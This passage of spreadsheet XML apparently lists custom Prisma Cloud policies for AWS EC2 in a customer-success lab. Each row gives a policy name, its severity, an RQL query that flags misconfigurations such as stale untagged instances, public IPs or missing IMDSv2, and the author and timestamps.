          <t>config from cloud.resource where tag ( any ) != 'owner' AND api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(launchTime) &gt; 7 and tags[*].value does not start with prismacloud-scan and tags[*].key does not contain owner" addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1659" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1659" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1659" t="inlineStr"/>
      <c r="AD1659" t="b">
        <v>0</v>
      </c>
      <c r="AE1659" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1659" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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59" t="inlineStr">
        <is>
          <t>7e30acf1-5605-40b8-8a55-a7836183354b</t>
        </is>
      </c>
      <c r="AI1659" t="inlineStr">
        <is>
          <t>4cc6dbc2-c89b-4cdb-891a-c3796df79984</t>
        </is>
      </c>
      <c r="AJ1659" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1659" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" t="inlineStr"/>
      <c r="B1660" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1660" s="2" t="inlineStr"/>
      <c r="D1660" t="n">
        <v>20</v>
      </c>
      <c r="E1660" t="n">
        <v>4</v>
      </c>
      <c r="F1660" t="n">
        <v>29</v>
      </c>
      <c r="G1660" t="b">
        <v>1</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1660" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1660" t="inlineStr">
        <is>
          <t>Vulnerable AWS EC2 instance not configured with Metadata Service v2 (IMDSv2) &amp; IAM role not enabled</t>
        </is>
      </c>
      <c r="L1660" t="inlineStr"/>
      <c r="M1660" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1660" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1660" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1660" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1660" t="inlineStr"/>
      <c r="R1660" t="inlineStr"/>
      <c r="S1660" t="inlineStr"/>
      <c r="T1660" t="b">
        <v>0</v>
      </c>
      <c r="U1660" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1660" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1660" t="inlineStr"/>
      <c r="X1660" t="inlineStr"/>
      <c r="Y1660" t="inlineStr"/>
      <c r="Z1660" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS EC2 Instance IAM Role not enabled' and 'AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)'))</t>
        </is>
      </c>
      <c r="AA1660" t="inlineStr">
        <is>
          <t>Muhammad Rehan</t>
        </is>
      </c>
      <c r="AB1660" t="inlineStr">
        <is>
          <t>2024-11-01 16:46:25</t>
        </is>
      </c>
      <c r="AC1660" t="inlineStr"/>
      <c r="AD1660" t="b">
        <v>0</v>
      </c>
      <c r="AE1660" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1660" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>6480bed4-8a9c-4903-994e-654e5d34327e</t>
        </is>
      </c>
      <c r="AI1660" t="inlineStr">
        <is>
          <t>d1403840-c86c-4fa2-8ecd-8ee2e6bd97b3</t>
        </is>
      </c>
      <c r="AJ1660" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1660" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" t="inlineStr">
        <is>
          <t>HIPAA, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B1661" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1661" s="2" t="inlineStr"/>
      <c r="D1661" t="inlineStr"/>
      <c r="E1661" t="inlineStr"/>
      <c r="F1661" t="inlineStr"/>
      <c r="G1661" t="b">
        <v>0</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1661" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1661" t="inlineStr">
        <is>
          <t>test_policy_vstoyko_2</t>
        </is>
      </c>
      <c r="L1661" t="inlineStr"/>
      <c r="M1661" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1661" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1661" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1661" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1661" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="R1661" t="inlineStr">
        <is>
          <t>3.11.7e</t>
        </is>
      </c>
      <c r="S1661" t="inlineStr">
        <is>
          <t>new_label,vstoyko : test</t>
        </is>
      </c>
      <c r="T1661" t="b">
        <v>0</v>
      </c>
      <c r="U1661" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1661" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1661" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1661" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1661" t="inlineStr"/>
      <c r="Z1661" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1661" t="inlineStr">
        <is>
          <t>Vitaliy Stoyko</t>
        </is>
      </c>
      <c r="AB1661" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1661" t="inlineStr"/>
      <c r="AD1661" t="b">
        <v>0</v>
      </c>
      <c r="AE1661" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1661" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>851c3c89-15f6-4b42-b330-1f8ea42e4687</t>
        </is>
      </c>
      <c r="AI1661" t="inlineStr">
        <is>
          <t>16588b52-36ec-47c8-8c23-907b2a8aeae6</t>
        </is>
      </c>
      <c r="AJ1661" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1661" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1662">
      <c r="A1662" t="inlineStr"/>
      <c r="B1662" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1662" s="2" t="inlineStr"/>
      <c r="D1662" t="inlineStr"/>
      <c r="E1662" t="inlineStr"/>
      <c r="F1662" t="inlineStr"/>
      <c r="G1662" t="b">
        <v>0</v>
      </c>
      <c r="H16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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1662" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1662" t="inlineStr">
        <is>
          <t>TestEricD</t>
        </is>
      </c>
      <c r="L1662" t="inlineStr"/>
      <c r="M1662" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1662" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1662" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1662" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1662" t="inlineStr"/>
      <c r="R1662" t="inlineStr"/>
      <c r="S1662" t="inlineStr"/>
      <c r="T1662" t="b">
        <v>0</v>
      </c>
      <c r="U1662" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1662" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1662" t="inlineStr"/>
      <c r="X1662" t="inlineStr"/>
      <c r="Y1662" t="inlineStr"/>
      <c r="Z1662" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = enaSupport is true</t>
        </is>
      </c>
      <c r="AA1662" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1662" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1662" t="inlineStr"/>
      <c r="AD1662" t="b">
        <v>0</v>
      </c>
      <c r="AE1662" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1662" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>b1d816c5-285d-496f-9b5b-c25976476f1b</t>
        </is>
      </c>
      <c r="AI1662" t="inlineStr">
        <is>
          <t>a1ae8b86-7aa0-4024-a49f-752c5b292905</t>
        </is>
      </c>
      <c r="AJ1662" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1662" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1663" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1663" s="2" t="inlineStr"/>
      <c r="D1663" t="n">
        <v>0</v>
      </c>
      <c r="E1663" t="n">
        <v>113</v>
      </c>
      <c r="F1663" t="n">
        <v>0</v>
      </c>
      <c r="G1663" t="b">
        <v>1</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1663" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1663" t="inlineStr">
        <is>
          <t>AWS EC2 - 7 Days - No Owner v3</t>
        </is>
      </c>
      <c r="L1663" t="inlineStr"/>
      <c r="M1663" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1663" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1663" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1663" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1663" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1663" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S1663" t="inlineStr"/>
      <c r="T1663" t="b">
        <v>0</v>
      </c>
      <c r="U1663" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1663" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1663" t="inlineStr"/>
      <c r="X1663" t="inlineStr"/>
      <c r="Y1663" t="inlineStr"/>
      <c r="Z1663" t="inlineStr">
        <is>
          <t>config from cloud.resource WHERE api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(launchTime) &gt; 7 and tags[*].value none start with prismacloud-scan and tags[*].key does not contain owner and tags[*].key none start with aws:autoscaling:groupName" addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1663" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1663" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1663" t="inlineStr"/>
      <c r="AD1663" t="b">
        <v>0</v>
      </c>
      <c r="AE1663" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1663" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>bc6ffa68-cc24-48fb-850e-4e60600b0ef4</t>
        </is>
      </c>
      <c r="AI1663" t="inlineStr">
        <is>
          <t>80ca3cc5-ca99-44fe-b00a-7200fda58eb5</t>
        </is>
      </c>
      <c r="AJ1663" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1663" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" t="inlineStr"/>
      <c r="B1664" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1664" s="2" t="inlineStr"/>
      <c r="D1664" t="inlineStr"/>
      <c r="E1664" t="inlineStr"/>
      <c r="F1664" t="inlineStr"/>
      <c r="G1664" t="b">
        <v>0</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1664" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1664" t="inlineStr">
        <is>
          <t>Copy of migration_test_policy_vstoyko_2</t>
        </is>
      </c>
      <c r="L1664" t="inlineStr"/>
      <c r="M1664" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1664" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1664" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1664" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1664" t="inlineStr"/>
      <c r="R1664" t="inlineStr"/>
      <c r="S1664" t="inlineStr">
        <is>
          <t>marclabel,SEC-01-01,new_label</t>
        </is>
      </c>
      <c r="T1664" t="b">
        <v>0</v>
      </c>
      <c r="U1664" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1664" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1664" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1664" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1664" t="inlineStr"/>
      <c r="Z1664" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1664" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1664" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1664" t="inlineStr"/>
      <c r="AD1664" t="b">
        <v>0</v>
      </c>
      <c r="AE1664" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1664" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>6a6320a5-13ff-4e07-8384-4ab40c23b65d</t>
        </is>
      </c>
      <c r="AI1664" t="inlineStr">
        <is>
          <t>d5faf957-a7a4-450f-8fd4-a1e0ddeda07e</t>
        </is>
      </c>
      <c r="AJ1664" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1664" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" t="inlineStr"/>
      <c r="B1665" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1665" s="2" t="inlineStr"/>
      <c r="D1665" t="inlineStr"/>
      <c r="E1665" t="inlineStr"/>
      <c r="F1665" t="inlineStr"/>
      <c r="G1665" t="b">
        <v>0</v>
      </c>
      <c r="H16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65" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1665" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1665" t="inlineStr">
        <is>
          <t>Pramm _AWS_Ec2_internet_exposed_with_vulnerabilities</t>
        </is>
      </c>
      <c r="L1665" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1665" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1665" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1665" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1665" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1665" t="inlineStr"/>
      <c r="R1665" t="inlineStr"/>
      <c r="S1665" t="inlineStr"/>
      <c r="T1665" t="b">
        <v>0</v>
      </c>
      <c r="U1665" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1665" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1665" t="inlineStr"/>
      <c r="X1665" t="inlineStr"/>
      <c r="Y1665" t="inlineStr"/>
      <c r="Z1665" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : ( Vuln where severity &gt;= MEDIUM )</t>
        </is>
      </c>
      <c r="AA1665" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1665" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:05</t>
        </is>
      </c>
      <c r="AC1665" t="inlineStr"/>
      <c r="AD1665" t="b">
        <v>0</v>
      </c>
      <c r="AE1665" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1665" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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65" t="inlineStr">
        <is>
          <t>47b4ae30-d905-46c5-a4c7-248334c27881</t>
        </is>
      </c>
      <c r="AI1665" t="inlineStr">
        <is>
          <t>de1d496f-3ddd-4e91-890e-8607da361d0d</t>
        </is>
      </c>
      <c r="AJ1665" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1665" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" t="inlineStr"/>
      <c r="B1666" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1666" s="2" t="inlineStr"/>
      <c r="D1666" t="n">
        <v>0</v>
      </c>
      <c r="E1666" t="n">
        <v>0</v>
      </c>
      <c r="F1666" t="n">
        <v>2</v>
      </c>
      <c r="G1666" t="b">
        <v>1</v>
      </c>
      <c r="H16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66" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1666" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1666" t="inlineStr">
        <is>
          <t>dmensah-shi-test-Must-not-scan-second</t>
        </is>
      </c>
      <c r="L1666" t="inlineStr"/>
      <c r="M1666" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1666" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1666" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1666" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1666" t="inlineStr"/>
      <c r="R1666" t="inlineStr"/>
      <c r="S1666" t="inlineStr"/>
      <c r="T1666" t="b">
        <v>0</v>
      </c>
      <c r="U1666" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1666" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1666" t="inlineStr"/>
      <c r="X1666" t="inlineStr"/>
      <c r="Y1666" t="inlineStr"/>
      <c r="Z1666" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'dmensah-shi-test1' AND api.name = 'aws-ec2-describe-instances' AND json.rule = tags[?(@.key=='shi-must-not-scan' &amp;&amp; @.value=='')].key exists</t>
        </is>
      </c>
      <c r="AA1666" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1666" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1666" t="inlineStr"/>
      <c r="AD1666" t="b">
        <v>0</v>
      </c>
      <c r="AE1666" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1666" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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66" t="inlineStr">
        <is>
          <t>da223c64-af5b-4628-9bd1-500514ed905b</t>
        </is>
      </c>
      <c r="AI1666" t="inlineStr">
        <is>
          <t>153446a1-a370-4640-b4f0-959bcf1f5045</t>
        </is>
      </c>
      <c r="AJ1666" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1666" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" t="inlineStr"/>
      <c r="B1667" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1667" s="2" t="inlineStr"/>
      <c r="D1667" t="inlineStr"/>
      <c r="E1667" t="inlineStr"/>
      <c r="F1667" t="inlineStr"/>
      <c r="G1667" t="b">
        <v>1</v>
      </c>
      <c r="H16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67" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1667" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1667" t="inlineStr">
        <is>
          <t>TAG Owner -mdavis1</t>
        </is>
      </c>
      <c r="L1667" t="inlineStr"/>
      <c r="M1667" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1667" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1667" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1667" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1667" t="inlineStr"/>
      <c r="R1667" t="inlineStr"/>
      <c r="S1667" t="inlineStr"/>
      <c r="T1667" t="b">
        <v>0</v>
      </c>
      <c r="U1667" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1667" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1667" t="inlineStr"/>
      <c r="X1667" t="inlineStr"/>
      <c r="Y1667" t="inlineStr"/>
      <c r="Z1667" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = tags[*].value contains "mdavis1"</t>
        </is>
      </c>
      <c r="AA1667" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1667" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1667" t="inlineStr"/>
      <c r="AD1667" t="b">
        <v>0</v>
      </c>
      <c r="AE1667" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1667" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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67" t="inlineStr">
        <is>
          <t>3eaa8a1e-1879-44c6-9ce6-ef717430e2f7</t>
        </is>
      </c>
      <c r="AI1667" t="inlineStr">
        <is>
          <t>22b0be0d-dd45-43ea-b08e-2078b658259e</t>
        </is>
      </c>
      <c r="AJ1667" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1667" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" t="inlineStr"/>
      <c r="B1668" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1668" s="2" t="inlineStr"/>
      <c r="D1668" t="inlineStr"/>
      <c r="E1668" t="inlineStr"/>
      <c r="F1668" t="inlineStr"/>
      <c r="G1668" t="b">
        <v>0</v>
      </c>
      <c r="H16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jaskimec2publictestalert, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I1668" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1668" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1668" t="inlineStr">
        <is>
          <t>jaskimtestec2public</t>
        </is>
      </c>
      <c r="L1668" t="inlineStr"/>
      <c r="M1668" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1668" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1668" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1668" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1668" t="inlineStr"/>
      <c r="R1668" t="inlineStr"/>
      <c r="S1668" t="inlineStr"/>
      <c r="T1668" t="b">
        <v>0</v>
      </c>
      <c r="U1668" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1668" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1668" t="inlineStr">
        <is>
          <t>policy to look for ec2 instances that have public access</t>
        </is>
      </c>
      <c r="X1668" t="inlineStr"/>
      <c r="Y1668" t="inlineStr"/>
      <c r="Z1668" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = publicIpAddress exists</t>
        </is>
      </c>
      <c r="AA1668" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1668" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1668" t="inlineStr"/>
      <c r="AD1668" t="b">
        <v>0</v>
      </c>
      <c r="AE1668" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1668" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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jaskimec2publictestalert - Notifications:email, AccountGroups:jasonkimaccountgroup;,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68" t="inlineStr">
        <is>
          <t>ca5be75e-22cc-4f50-8284-e6c78520e4e4</t>
        </is>
      </c>
      <c r="AI1668" t="inlineStr">
        <is>
          <t>69284d07-7158-45af-9baf-42e99c9e5a3a</t>
        </is>
      </c>
      <c r="AJ1668" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1668" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" t="inlineStr"/>
      <c r="B1669" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1669" s="2" t="inlineStr"/>
      <c r="D1669" t="inlineStr"/>
      <c r="E1669" t="inlineStr"/>
      <c r="F1669" t="inlineStr"/>
      <c r="G1669" t="b">
        <v>0</v>
      </c>
      <c r="H16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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1669" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1669" t="inlineStr">
        <is>
          <t>test-policy</t>
        </is>
      </c>
      <c r="L1669" t="inlineStr"/>
      <c r="M1669" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1669" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1669" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1669" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1669" t="inlineStr"/>
      <c r="R1669" t="inlineStr"/>
      <c r="S1669" t="inlineStr"/>
      <c r="T1669" t="b">
        <v>0</v>
      </c>
      <c r="U1669" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1669" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1669" t="inlineStr"/>
      <c r="X1669" t="inlineStr"/>
      <c r="Y1669" t="inlineStr"/>
      <c r="Z1669" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = state.name equals "running"</t>
        </is>
      </c>
      <c r="AA1669" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1669" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1669" t="inlineStr"/>
